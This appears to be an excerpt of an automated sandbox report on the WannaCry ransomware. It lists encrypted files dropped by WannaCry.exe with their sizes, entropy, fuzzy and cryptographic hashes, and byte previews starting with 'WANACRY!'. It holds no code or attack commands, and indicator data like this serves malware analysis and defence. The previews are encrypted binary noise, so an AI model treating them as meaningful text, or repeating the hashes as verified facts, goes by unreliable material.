                                                                              SHA-512:2A676BA7B9F87C9FFED5FD50BBF94E266AD2D305244BFD8976E6F6D93C88DEDBA37C02B1B9BABA803504713450A83EC467D9DD08E50F5D7E434306E3A62771D0
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....IL(r\.%.s.... 7....:...J,..N..:...<.2+C..EGDF..-.........z......| Pk..a.8]2.."....$L..}X....$J....~f.....H.K.1.n.........Z...+..Z.7Uzc.~..Go7;....` `..J4.c.X...{..j..h..7..e9Q.).....{.o-.N}....Q....%.\.V.(x...~...lk......$...x.v(...db..}..............Q..........x~b~.1.....?7......)......lW..?..........9..R......P.{.b...=... s$.g..q...}p..0..".....M.;.(6..$..xQIu.%.C".....,.)...e.%8...&v'.j.G66..}..M..Jv.y....8.<........;..5.O...]lC.f..}..`.?L..Q1...`........!.Y.h.....,h'`.....).1.D........b....LQ0$...1t./.....T...BP. ..ut....w.}..<.....Q..2....=...<.S..^..m...!.G......G..C........b.^E..b.je.^J.c.:..~2$.....h-^4\.}....Z..d.w.P..j..E@...P..W]..r.P..6....o.....{.....pc..u..{.....ED....F..$...Ze...^....;iL....G..2[}v...Y....:^g2..~._nv..#LP5a%h...".|.3.-......uq.xY*...... ..B>-..i...C...#|..W.g..&.". .J...R."`.3....<.o...#..Nt....ys.[...U..0Hi.|9)q........2..VL``.._>...[.;$...hXU.[..HPg.Ek.6.....c.>[....z.Qq..w..N.q....{v.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):702504
                                                                              Entropy (8bit):7.999730745166842
                                                                              Encrypted:true
                                                                              SSDEEP:12288:DosN1q12Z4aDs2Kgqbz8Sq2PbsdNMaw3deq8eW2ciTK1G0iEVCNcgG+QsA8jKI22:zRwUqpEiaAddc9gGhsA8jA/gj
                                                                              MD5:3AC866E9904AD8161A19FADB62DA3549
                                                                              SHA1:D6FCBF2B37B6EE36FB102387E67CAD111E21A557
                                                                              SHA-256:1CB3FBD2587A9C86C467E0A78CAE93B837C612E72D922D3D5A9323030CD58622
                                                                              SHA-512:2A676BA7B9F87C9FFED5FD50BBF94E266AD2D305244BFD8976E6F6D93C88DEDBA37C02B1B9BABA803504713450A83EC467D9DD08E50F5D7E434306E3A62771D0
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....IL(r\.%.s.... 7....:...J,..N..:...<.2+C..EGDF..-.........z......| Pk..a.8]2.."....$L..}X....$J....~f.....H.K.1.n.........Z...+..Z.7Uzc.~..Go7;....` `..J4.c.X...{..j..h..7..e9Q.).....{.o-.N}....Q....%.\.V.(x...~...lk......$...x.v(...db..}..............Q..........x~b~.1.....?7......)......lW..?..........9..R......P.{.b...=... s$.g..q...}p..0..".....M.;.(6..$..xQIu.%.C".....,.)...e.%8...&v'.j.G66..}..M..Jv.y....8.<........;..5.O...]lC.f..}..`.?L..Q1...`........!.Y.h.....,h'`.....).1.D........b....LQ0$...1t./.....T...BP. ..ut....w.}..<.....Q..2....=...<.S..^..m...!.G......G..C........b.^E..b.je.^J.c.:..~2$.....h-^4\.}....Z..d.w.P..j..E@...P..W]..r.P..6....o.....{.....pc..u..{.....ED....F..$...Ze...^....;iL....G..2[}v...Y....:^g2..~._nv..#LP5a%h...".|.3.-......uq.xY*...... ..B>-..i...C...#|..W.g..&.". .J...R."`.3....<.o...#..Nt....ys.[...U..0Hi.|9)q........2..VL``.._>...[.;$...hXU.[..HPg.Ek.6.....c.>[....z.Qq..w..N.q....{v.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):21048
                                                                              Entropy (8bit):7.99166155462598
                                                                              Encrypted:true
                                                                              SSDEEP:384:5gCJozIqZCe9X5O+vUMCrKUAAWuRLDpSP7VnTtVyEsTIDOHZBUcfEQraNVsdGmxx:5VGI89hF+HxRhS5TtV40OHvUc8QSsdLz
                                                                              MD5:87DED5B46B200A45B9FDBDC2F28FAD50
                                                                              SHA1:DD2E269A14A4F2075EFBC89D0D5844A83C7C5600
                                                                              SHA-256:A3670F6E269AE716BCB120AFD7C04AA02C065749B9A52D2D87158E3CB770DCE7
                                                                              SHA-512:9831269B7A1B2B2AAAA68F976F81242F09C890B5F5E807C785C800312B31E47A4DD60D79D65EDDCDE7AC07CE4C8BC9C0298369AE3523508F467152F72501DC89
                                                                              Malicious:true
                                                                              Preview:WANACRY!........0..Cjio...=..X0.f...0j.......o.p..(.....^...1.{.f#.@..zyi.......ryOw.CgN..s.....Ro.+.yX.SC.+x#m.!.@.@.BV..o.^e..N.5w....&z..X.c...$.@.A9/..s...pY.N.@u.."....Qj|.Ov{...*...wN.....\..h1.wp...O..z96x..h....w.{o<"...q...~......cI..: ......U.......Q....... .j....q[.0Z.e..*Rt-.A.R.r...j..Ccd4F....x...]2c....O.........^./i(..?....M...`....z.O%Q........j../....m..~...^.}..ev!..|jRs..M.....1.x..;=.......]| .......nC^.vLY.bkU..#..W..O.Kd.Y......*......ti.a.,5\.a....@....7.g^W...17_..A.5W-....2._G^...G.e."...Ln.s........E3.y.e.3....](.....?G|$.]...*..*.A.}..z.......G9M...i....@J..-.-t...'..s;l7..=.g..\.._..1.a..e.[...S ,l(..vu.9^.#.j.0.............=..d.IW.0...p.{..(70{..=USHA...:Z.S...@.u*......{..a........MX....%..@...E".....FX.].i.e.Zw.....T.G.0...<u...)..k...u(..0......r.0..J^.e..`../I..... .....:.qm..........T.3..C.X......u3....`{..,.1<.E.....5..L..Nb.j........s:.o.V........=-v....d`.j...G*.s5'... ...g.,N.#`O..}.....t.fh.z
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):21048
                                                                              Entropy (8bit):7.99166155462598
                                                                              Encrypted:true
                                                                              SSDEEP:384:5gCJozIqZCe9X5O+vUMCrKUAAWuRLDpSP7VnTtVyEsTIDOHZBUcfEQraNVsdGmxx:5VGI89hF+HxRhS5TtV40OHvUc8QSsdLz
                                                                              MD5:87DED5B46B200A45B9FDBDC2F28FAD50
                                                                              SHA1:DD2E269A14A4F2075EFBC89D0D5844A83C7C5600
                                                                              SHA-256:A3670F6E269AE716BCB120AFD7C04AA02C065749B9A52D2D87158E3CB770DCE7
                                                                              SHA-512:9831269B7A1B2B2AAAA68F976F81242F09C890B5F5E807C785C800312B31E47A4DD60D79D65EDDCDE7AC07CE4C8BC9C0298369AE3523508F467152F72501DC89
                                                                              Malicious:true
                                                                              Preview:WANACRY!........0..Cjio...=..X0.f...0j.......o.p..(.....^...1.{.f#.@..zyi.......ryOw.CgN..s.....Ro.+.yX.SC.+x#m.!.@.@.BV..o.^e..N.5w....&z..X.c...$.@.A9/..s...pY.N.@u.."....Qj|.Ov{...*...wN.....\..h1.wp...O..z96x..h....w.{o<"...q...~......cI..: ......U.......Q....... .j....q[.0Z.e..*Rt-.A.R.r...j..Ccd4F....x...]2c....O.........^./i(..?....M...`....z.O%Q........j../....m..~...^.}..ev!..|jRs..M.....1.x..;=.......]| .......nC^.vLY.bkU..#..W..O.Kd.Y......*......ti.a.,5\.a....@....7.g^W...17_..A.5W-....2._G^...G.e."...Ln.s........E3.y.e.3....](.....?G|$.]...*..*.A.}..z.......G9M...i....@J..-.-t...'..s;l7..=.g..\.._..1.a..e.[...S ,l(..vu.9^.#.j.0.............=..d.IW.0...p.{..(70{..=USHA...:Z.S...@.u*......{..a........MX....%..@...E".....FX.].i.e.Zw.....T.G.0...<u...)..k...u(..0......r.0..J^.e..`../I..... .....:.qm..........T.3..C.X......u3....`{..,.1<.E.....5..L..Nb.j........s:.o.V........=-v....d`.j...G*.s5'... ...g.,N.#`O..}.....t.fh.z
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):53480
                                                                              Entropy (8bit):7.99664912453788
                                                                              Encrypted:true
                                                                              SSDEEP:1536:EGuddmaBtQvj5cKe0BMvwTrUgtE3yqPQqsmFOBWy1j:Udz4j9ewjtGy+QdmcWK
                                                                              MD5:25C0B6B0E5BC2EEAFB8B3DE3C034E3A2
                                                                              SHA1:0F3DB4529FFC3EE7971D7CF27746EC93F73E7A08
                                                                              SHA-256:6A411B29BA796D8DF5D2F6FC1AD3EE067F4C64EFDF5EFCFA50EA81C5DBA87617
                                                                              SHA-512:6E2CA22374B400774DC0C540B70FBE9462A36C46CD043C5B8B39391E758FBCA9B47E5D1CCE73EFDE7CFD88F49A5B16DBAF4C479E745F27F4BD6C4A809D82F4C5
                                                                              Malicious:true
                                                                              Preview:WANACRY!....N....H.Mb]...^...v..X.`......v)..9i............~msm...[..C...O.hA{....+.8.!..K}........Y.]..Jg`.&^......NR...+m..<..`...(..2tqy .....bK...E. I1C...x..lX.Cm>b..K........C..&N.7....@....#..P...i-...>......c:...F...q.q..xHL.Q..T....9.:wr(.................j..AE...Yn...b.Q.tK"...GA.4.`&.lhawFk..]L.{.C.....,..m.PJ..8.$&..Oi..aE..}...."f4i.:..o.:.^?.l.h%..e.l.\F...Pd..............4.re~.-..v.1R....j..^..6.u....lj..o.......pV.-.p.t-....7#.3.M..M7..M..(l..R..\=F<2*:....9...V..V....cc.^..qF.)u&=d....6.]Q.<...=,,.&..Dp..a..0Xw ....Py)....@.....CFn.."..*.v|...o.....j.m........P...|u.H..n..z..?^.E..M...@.Bg.#>J.&...Y/"o.....g......}..M..#.....?....ll..Yc......d=........d%.~.eM7.h'.Ps...!.F7.k..%.$...0...zn.p.=.H.....V~..p.Aq..4m6...*1m...,jK.4..&N...lqR.L...3o......N.....{......E.K6.m....1.Z..........D..H..j0.Y..>|..+72....d....L\zJi..)U.#.._..U`.b.\w.1."....r...z...d..N%:.].... z....7./.$........#...r..L.._...\.....7........g..<W..Fdhk.."...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):53480
                                                                              Entropy (8bit):7.99664912453788
                                                                              Encrypted:true
                                                                              SSDEEP:1536:EGuddmaBtQvj5cKe0BMvwTrUgtE3yqPQqsmFOBWy1j:Udz4j9ewjtGy+QdmcWK
                                                                              MD5:25C0B6B0E5BC2EEAFB8B3DE3C034E3A2
                                                                              SHA1:0F3DB4529FFC3EE7971D7CF27746EC93F73E7A08
                                                                              SHA-256:6A411B29BA796D8DF5D2F6FC1AD3EE067F4C64EFDF5EFCFA50EA81C5DBA87617
                                                                              SHA-512:6E2CA22374B400774DC0C540B70FBE9462A36C46CD043C5B8B39391E758FBCA9B47E5D1CCE73EFDE7CFD88F49A5B16DBAF4C479E745F27F4BD6C4A809D82F4C5
                                                                              Malicious:true
                                                                              Preview:WANACRY!....N....H.Mb]...^...v..X.`......v)..9i............~msm...[..C...O.hA{....+.8.!..K}........Y.]..Jg`.&^......NR...+m..<..`...(..2tqy .....bK...E. I1C...x..lX.Cm>b..K........C..&N.7....@....#..P...i-...>......c:...F...q.q..xHL.Q..T....9.:wr(.................j..AE...Yn...b.Q.tK"...GA.4.`&.lhawFk..]L.{.C.....,..m.PJ..8.$&..Oi..aE..}...."f4i.:..o.:.^?.l.h%..e.l.\F...Pd..............4.re~.-..v.1R....j..^..6.u....lj..o.......pV.-.p.t-....7#.3.M..M7..M..(l..R..\=F<2*:....9...V..V....cc.^..qF.)u&=d....6.]Q.<...=,,.&..Dp..a..0Xw ....Py)....@.....CFn.."..*.v|...o.....j.m........P...|u.H..n..z..?^.E..M...@.Bg.#>J.&...Y/"o.....g......}..M..#.....?....ll..Yc......d=........d%.~.eM7.h'.Ps...!.F7.k..%.$...0...zn.p.=.H.....V~..p.Aq..4m6...*1m...,jK.4..&N...lqR.L...3o......N.....{......E.K6.m....1.Z..........D..H..j0.Y..>|..+72....d....L\zJi..)U.#.._..U`.b.\w.1."....r...z...d..N%:.].... z....7./.$........#...r..L.._...\.....7........g..<W..Fdhk.."...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):13176
                                                                              Entropy (8bit):7.985593801989342
                                                                              Encrypted:false
                                                                              SSDEEP:384:wL7Wx1EdYVemc32DUP07FnznXE2nTTE8Xe5:wM1ZYNmDUP0ZTX5TA8u5
                                                                              MD5:A7705550AB7C903341315B2929CB40AB
                                                                              SHA1:DDF86D429C967EC495875A06FA4A6D7DA936F687
                                                                              SHA-256:C552E0A332A3D724E692A37DE31B1886EFD11B2CE8DE60FFE0B8579080258E6C
                                                                              SHA-512:261E667C297070EC5342394F232251659FD815DBBA0C88611623EEAFD8EBB9820321BF4F08D55542DBA20D9DC148F94F0112D79DC948DC82765F77DE5B72155A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....+.....-...~.R&A\...ZX,.\60].R.E..&Ic.....+.Rg...R....5.>.[./.\....}#|......Iw.42}a.<...?..}J1.....#l..r"....@J6..!j.a....W.s<....F.... .n.)HPf.#.|..>...W6%&..K...RV|T!z..H.?|..S.hK.X..|..]...t.Z.WH.w.=.l....".l.9..,..e.U.8..C...PZ....PT8c....^2......WL..../.x..7B..O(c..t.......e..Hi.C....N..@.\..F...%.d.Q..qO..fL.].. ..*.........z......f...%.x.yv0.5...H.a...D<..6.%hi[...dE.T..f[...g~...K.E.X....{J.W.f.(.P....;...j..u....... n..oI..co...I=%.Fl...Z......%t..=..wn..5Y$w.%F)(=.........J.....~zhb.FY.+..B......Xo7-k.t....[^.....%E.@.6..k...cH...hv.kU..=..=.E...!...:.5.I......l!`.z.<z2.yc...(.......1.Sp}.E4......jn.....m..,.$...v...d...'+}....Uq{...|.....\.....x.6 ..Z.]y.._.]....O..f:..[...Y!.z6...eO^.]......:lpQ..Gv.A...$]i.gU#.............Eq....d"..A.,.|..aSi.d.4. ....V.,..@.%~l.#..s......,=6..../:;.QR..-d.A.v.J*.}..Z...Y.+%b.fZ.@......*]....Xs.r..<0..9...d.....qvZ[4p*\.{...P.q......~..K.e....../...H.7....],.\Ti.U.l..W..+...S
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):13176
                                                                              Entropy (8bit):7.985593801989342
                                                                              Encrypted:false
                                                                              SSDEEP:384:wL7Wx1EdYVemc32DUP07FnznXE2nTTE8Xe5:wM1ZYNmDUP0ZTX5TA8u5
                                                                              MD5:A7705550AB7C903341315B2929CB40AB
                                                                              SHA1:DDF86D429C967EC495875A06FA4A6D7DA936F687
                                                                              SHA-256:C552E0A332A3D724E692A37DE31B1886EFD11B2CE8DE60FFE0B8579080258E6C
                                                                              SHA-512:261E667C297070EC5342394F232251659FD815DBBA0C88611623EEAFD8EBB9820321BF4F08D55542DBA20D9DC148F94F0112D79DC948DC82765F77DE5B72155A
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....+.....-...~.R&A\...ZX,.\60].R.E..&Ic.....+.Rg...R....5.>.[./.\....}#|......Iw.42}a.<...?..}J1.....#l..r"....@J6..!j.a....W.s<....F.... .n.)HPf.#.|..>...W6%&..K...RV|T!z..H.?|..S.hK.X..|..]...t.Z.WH.w.=.l....".l.9..,..e.U.8..C...PZ....PT8c....^2......WL..../.x..7B..O(c..t.......e..Hi.C....N..@.\..F...%.d.Q..qO..fL.].. ..*.........z......f...%.x.yv0.5...H.a...D<..6.%hi[...dE.T..f[...g~...K.E.X....{J.W.f.(.P....;...j..u....... n..oI..co...I=%.Fl...Z......%t..=..wn..5Y$w.%F)(=.........J.....~zhb.FY.+..B......Xo7-k.t....[^.....%E.@.6..k...cH...hv.kU..=..=.E...!...:.5.I......l!`.z.<z2.yc...(.......1.Sp}.E4......jn.....m..,.$...v...d...'+}....Uq{...|.....\.....x.6 ..Z.]y.._.]....O..f:..[...Y!.z6...eO^.]......:lpQ..Gv.A...$]i.gU#.............Eq....d"..A.,.|..aSi.d.4. ....V.,..@.%~l.#..s......,=6..../:;.QR..-d.A.v.J*.}..Z...Y.+%b.fZ.@......*]....Xs.r..<0..9...d.....qvZ[4p*\.{...P.q......~..K.e....../...H.7....],.\Ti.U.l..W..+...S
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):43880
                                                                              Entropy (8bit):7.995603827365766
                                                                              Encrypted:true
                                                                              SSDEEP:768:8WNCDh90ndh6RBiydG2WsHHA2d8lL1AFV1sxKumfp9UGMf:An8n6+ydIsHHA7LlYfjK
                                                                              MD5:05EB613EBC3CF46B19E522C230F58B89
                                                                              SHA1:3E54AFA6A4A8399B0EAD4B012182BC1C9F2071B0
                                                                              SHA-256:8952192A2E9B1A794C5F39A766AEE324E6C30A67145EE7172BAC8DE56C42320D
                                                                              SHA-512:D32F6FC5698116A3D1483A69B127D62FEAA1D09A857619DE08AB223A3F3FD05127346A84FF04E5AC3EF85CCB6BE090F019A175D080F858BCEC00814DD672E484
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....5,...$.h...ZzF.I`...H.....8v'.&....R.VD)..!ib..Z.SC..D.?.>.U...yH...3.g.Q.v(|....+...B..A.......{..~.rq...@.u@...m.4Z...........1c./...@c.....N.y..j..e^...I.+!.a.......@f.l..%K..JbeN..<~&t..cqf.2...b......6c.t9....~.*Qm=$..R...K....w.,..`..O.R..s....H...........TT'Z.E+.'a.'{8&0=..d.w=...$...R..B.E.m...O..NT.i........E.1`H.p...y)z.X-e.|....O..7..:...n.>(.s..^.p./^...%.UT...,.fJ.-:%.r..~..U.;.Y..(BT./..|....q......2;...6v....#YkD..!...i.m..$.WvA.).-Z...y..".:.E[*/R......@.(%...iL>..$.E.`~..;....Z.7.`1CoU.~"$....>^...x..x....k:.K.~..9.a&.l....,.z....k....aD..?:..m.`....P7..O..\8I..s.>...2[(......D.6$.L..f+e.......G[..rf...C.B.~$.Y..$........,.:.*&g....<m...... =...'.#....O.@......h.w.`.........z....A,.Nia+;.{)3..YQ.E$.J[....z.}.0/i.E..n...a....[j.K.F0...p.+.P...U].x. ...R;.%f.X..-...Q.}.N.Q.....^....IU..)_'..Yz....<.x.XtO../.i...0...` ..t.F./...q..=.U?..#..U|*.W.Z.&..cK...LI`A.P..J......Oh.r......$..c(MO.."3{R....!......G..g}..^|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):43880
                                                                              Entropy (8bit):7.995603827365766
                                                                              Encrypted:true
                                                                              SSDEEP:768:8WNCDh90ndh6RBiydG2WsHHA2d8lL1AFV1sxKumfp9UGMf:An8n6+ydIsHHA7LlYfjK
                                                                              MD5:05EB613EBC3CF46B19E522C230F58B89
                                                                              SHA1:3E54AFA6A4A8399B0EAD4B012182BC1C9F2071B0
                                                                              SHA-256:8952192A2E9B1A794C5F39A766AEE324E6C30A67145EE7172BAC8DE56C42320D
                                                                              SHA-512:D32F6FC5698116A3D1483A69B127D62FEAA1D09A857619DE08AB223A3F3FD05127346A84FF04E5AC3EF85CCB6BE090F019A175D080F858BCEC00814DD672E484
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....5,...$.h...ZzF.I`...H.....8v'.&....R.VD)..!ib..Z.SC..D.?.>.U...yH...3.g.Q.v(|....+...B..A.......{..~.rq...@.u@...m.4Z...........1c./...@c.....N.y..j..e^...I.+!.a.......@f.l..%K..JbeN..<~&t..cqf.2...b......6c.t9....~.*Qm=$..R...K....w.,..`..O.R..s....H...........TT'Z.E+.'a.'{8&0=..d.w=...$...R..B.E.m...O..NT.i........E.1`H.p...y)z.X-e.|....O..7..:...n.>(.s..^.p./^...%.UT...,.fJ.-:%.r..~..U.;.Y..(BT./..|....q......2;...6v....#YkD..!...i.m..$.WvA.).-Z...y..".:.E[*/R......@.(%...iL>..$.E.`~..;....Z.7.`1CoU.~"$....>^...x..x....k:.K.~..9.a&.l....,.z....k....aD..?:..m.`....P7..O..\8I..s.>...2[(......D.6$.L..f+e.......G[..rf...C.B.~$.Y..$........,.:.*&g....<m...... =...'.#....O.@......h.w.`.........z....A,.Nia+;.{)3..YQ.E$.J[....z.}.0/i.E..n...a....[j.K.F0...p.+.P...U].x. ...R;.%f.X..-...Q.}.N.Q.....^....IU..)_'..Yz....<.x.XtO../.i...0...` ..t.F./...q..=.U?..#..U|*.W.Z.&..cK...LI`A.P..J......Oh.r......$..c(MO.."3{R....!......G..g}..^|
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.572636598230886
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEC7Y5L1nQxozAiOI5gQ24B/dptydBNF2YDgdER9hJY3:bkGciOIet4B8DmEvU
                                                                              MD5:8EE576EDA54FC1B5861E9A5B64858B33
                                                                              SHA1:A89A0E89FF7FDB24A62EE956F1741078B6DAE634
                                                                              SHA-256:D2C06397C2F27DBC58AC4059D0FBE1194182C46F072B6F2CAB68E87897111BB5
                                                                              SHA-512:1742628FD798C1A94BF202D6C8E6C0E4C32813DE1B92863088088A61C4AFA35E08E24BD1C24B81A26F03DCF262D5787AF5E960BD06206618F446B2DE2AE71E92
                                                                              Malicious:false
                                                                              Preview:WANACRY!......P...y..t.B....r...%..~..).H,J`.e9........B......Bm...*.....jX.90..b.).).<.|..J.wO...D.P.!.......A....Y-pGq.k.(....t..F~.$$.wn..>.2..#_.....V.wh;.td..2.j.....b....(8./..YwA..x.....!..4U|/.a.FC.<.L.d..S...=....J..5V4.rv@n.5....%..._........a.......#........U...p.......NV.j>VF..Un.........'P..c.%..*..!.|4.mc..U..~...4.x..........p3..|En`w......r}.9....!.....J.h\..1...E....LI.v.D.<A_.....>...y.......y...'...H.\.7.Y1..B..L.".wD%.,....#_I...Z.E....Z.-..R.#.Q(../bT.......sE..^.A...#.&Y.3..~..d......._..h._.{Rs..Z.o...J.X..I...ik.....e~.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.572636598230886
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEC7Y5L1nQxozAiOI5gQ24B/dptydBNF2YDgdER9hJY3:bkGciOIet4B8DmEvU
                                                                              MD5:8EE576EDA54FC1B5861E9A5B64858B33
                                                                              SHA1:A89A0E89FF7FDB24A62EE956F1741078B6DAE634
                                                                              SHA-256:D2C06397C2F27DBC58AC4059D0FBE1194182C46F072B6F2CAB68E87897111BB5
                                                                              SHA-512:1742628FD798C1A94BF202D6C8E6C0E4C32813DE1B92863088088A61C4AFA35E08E24BD1C24B81A26F03DCF262D5787AF5E960BD06206618F446B2DE2AE71E92
                                                                              Malicious:false
                                                                              Preview:WANACRY!......P...y..t.B....r...%..~..).H,J`.e9........B......Bm...*.....jX.90..b.).).<.|..J.wO...D.P.!.......A....Y-pGq.k.(....t..F~.$$.wn..>.2..#_.....V.wh;.td..2.j.....b....(8./..YwA..x.....!..4U|/.a.FC.<.L.d..S...=....J..5V4.rv@n.5....%..._........a.......#........U...p.......NV.j>VF..Un.........'P..c.%..*..!.|4.mc..U..~...4.x..........p3..|En`w......r}.9....!.....J.h\..1...E....LI.v.D.<A_.....>...y.......y...'...H.\.7.Y1..B..L.".wD%.,....#_I...Z.E....Z.-..R.#.Q(../bT.......sE..^.A...#.&Y.3..~..d......._..h._.{Rs..Z.o...J.X..I...ik.....e~.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):138488
                                                                              Entropy (8bit):7.998377439654302
                                                                              Encrypted:true
                                                                              SSDEEP:3072:+rNoCgaDh3zr34sTtPGbD0SrhqajSO87SM0Y/HOrG1+vXjx:8+QBZObD0wQajwSXY/OXt
                                                                              MD5:955A7912BD5D9A3AE910AF1D3DB10D8A
                                                                              SHA1:1FC868C84C9003B5BC4715F38F84E814309B2800
                                                                              SHA-256:54C9C72A886AA2143BC879A24D3482B9A75575A8A8B2A80E546CB3556D9840D7
                                                                              SHA-512:0678B7D0B67C76917E881DD4FB687F9F13B8FBA96825F87FD6EAD0F31E6D6116B90F322396C5D1E2226DB9A8DD5AB96E5B7EB49799E4268E3A010C8E4AEC2101
                                                                              Malicious:true
                                                                              Preview:WANACRY!......oX...k'....h..-lr.....n...N$rL.-c....U..'..mD.X._..Fw.@/..8.....I.0.l.....h.8/e..2.o..x.[.., .gJ6.]........o..O@,%t;.Q..+..?.g...U$X...W...t....aq.-...w.C..eb....ow..y..}H*L7_.{.9.|..W.....c...B..........Wi/3..`I.e..\....j.9@nY..T.4urK.&.~..............7....h.ZR.R...?$....F.CF.F5..t..%.+.....p...|.Ix.V!.^)..^.P"v..5iA.*OZ..xh.+^..ko.:....t.gj=T..D.A.g.r....!..I.PN.wE....f..,....u..sO.[.[t.....Y.J.a{^....+..Voq..k Vw.......c......'..4g...B........0..&u..^..y......2l.2u/j.|.v.^.9.z......q..dk...)R1p...9.k.J...._..Y6..p......e.....Yn.(...A8.u. i..R."q..x.FNs.. ...=....OV.wa...{.n..xq>o.N.v......>.....h4..;.....p.;f^.....J........J*`..(....`...."..i.i.4-..6.A...H....l.$8-.R..".~..I...y.....S!!,.R....[.w\.>!%(d...Q.[._.0..jc...r..s.........u.M.w........E.Iw`.......1..$I,..(.......F'..*......~.2...B*..uW..".>...,.l...d..;S..gB..r....L......b.....z..?d..&`....u}.r.....@..d..`......X.."D..3.W..D.d..y..W.Y..".Q..5.4....N^...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):138488
                                                                              Entropy (8bit):7.998377439654302
                                                                              Encrypted:true
                                                                              SSDEEP:3072:+rNoCgaDh3zr34sTtPGbD0SrhqajSO87SM0Y/HOrG1+vXjx:8+QBZObD0wQajwSXY/OXt
                                                                              MD5:955A7912BD5D9A3AE910AF1D3DB10D8A
                                                                              SHA1:1FC868C84C9003B5BC4715F38F84E814309B2800
                                                                              SHA-256:54C9C72A886AA2143BC879A24D3482B9A75575A8A8B2A80E546CB3556D9840D7
                                                                              SHA-512:0678B7D0B67C76917E881DD4FB687F9F13B8FBA96825F87FD6EAD0F31E6D6116B90F322396C5D1E2226DB9A8DD5AB96E5B7EB49799E4268E3A010C8E4AEC2101
                                                                              Malicious:true
                                                                              Preview:WANACRY!......oX...k'....h..-lr.....n...N$rL.-c....U..'..mD.X._..Fw.@/..8.....I.0.l.....h.8/e..2.o..x.[.., .gJ6.]........o..O@,%t;.Q..+..?.g...U$X...W...t....aq.-...w.C..eb....ow..y..}H*L7_.{.9.|..W.....c...B..........Wi/3..`I.e..\....j.9@nY..T.4urK.&.~..............7....h.ZR.R...?$....F.CF.F5..t..%.+.....p...|.Ix.V!.^)..^.P"v..5iA.*OZ..xh.+^..ko.:....t.gj=T..D.A.g.r....!..I.PN.wE....f..,....u..sO.[.[t.....Y.J.a{^....+..Voq..k Vw.......c......'..4g...B........0..&u..^..y......2l.2u/j.|.v.^.9.z......q..dk...)R1p...9.k.J...._..Y6..p......e.....Yn.(...A8.u. i..R."q..x.FNs.. ...=....OV.wa...{.n..xq>o.N.v......>.....h4..;.....p.;f^.....J........J*`..(....`...."..i.i.4-..6.A...H....l.$8-.R..".~..I...y.....S!!,.R....[.w\.>!%(d...Q.[._.0..jc...r..s.........u.M.w........E.Iw`.......1..$I,..(.......F'..*......~.2...B*..uW..".>...,.l...d..;S..gB..r....L......b.....z..?d..&`....u}.r.....@..d..`......X.."D..3.W..D.d..y..W.Y..".Q..5.4....N^...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):20568
                                                                              Entropy (8bit):7.992297934009613
                                                                              Encrypted:true
                                                                              SSDEEP:384:vA4kuzSh+U7QgUcC34Oyj5y3N4z3rEI/9LUJNHHMrJSDQn:vA4Vz2LU/3tcgNk/+J9UkEn
                                                                              MD5:A8DAA99123FB26D8C66D74FD77D85DDD
                                                                              SHA1:F1642C331B23B0E6D741DEED138803096EAFE718
                                                                              SHA-256:615820ACF01104C41E090AD6B804213377A6A37CC719B03C207CEC656D00661A
                                                                              SHA-512:82A824AF5454CBB9B5E438509420C417D08CEDC93F8A4A4BD3F34DF5EEE7730E6F6AEF575A2946BB2814EA3E1E6290322DC8EF5379CF3C756051A7ECB8FA54F4
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....Apd..o.x.80ybM....@..&.#m[+..6-z'.n._sz...n[(.l.FuXa.....Z;..x#.{k.]...M.|.+.]..k..n..)=&Y...t....>r....%M...}j..]....w.........C.~.ZSA.94G....R.L!..;9.c.R.......yX`i.`.2E....=.....B...:A.....1.0...w`&..8S.$j;..g..../..E..8...1..\......$...F.....4O......OW......\0<N...._9......R..U....Kla..\.Y...I5.....rm.<.&3../W.......z.d....M.<..sm....}.$....n...Q......N_S.3~k.Kt0c....A..v...&....f...=.......@.... t*..o..V.n....[..kg.M...N...;...e....L'....M..}.X[ede.y..: e...\.F....g..9...'......U.Q,... 8...D.u.-.T&`..U.....c..s....\......5.....E$..|........1H.b.vG..........;n.-..2$.{>....W..7!V.1.@.D...4...r"..H.JH...}.....u..NCRX.H.QIV..g.....%.0.S......*.$.6ppD..b.....[.. V.'j.c.P...%..(R..*..V.F..*X...+.....c........a..Dd..E..........|...]..........-C....".-v8t.........2...$.l*...../..i;....c...'..U.=#.x~K.......G...u,1j :...}'.i.....v..].~.W...6..x".p....S.....rX&.....\..+...c...~../.......3BCq.(....%.8=.R ....G?=..........j..+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
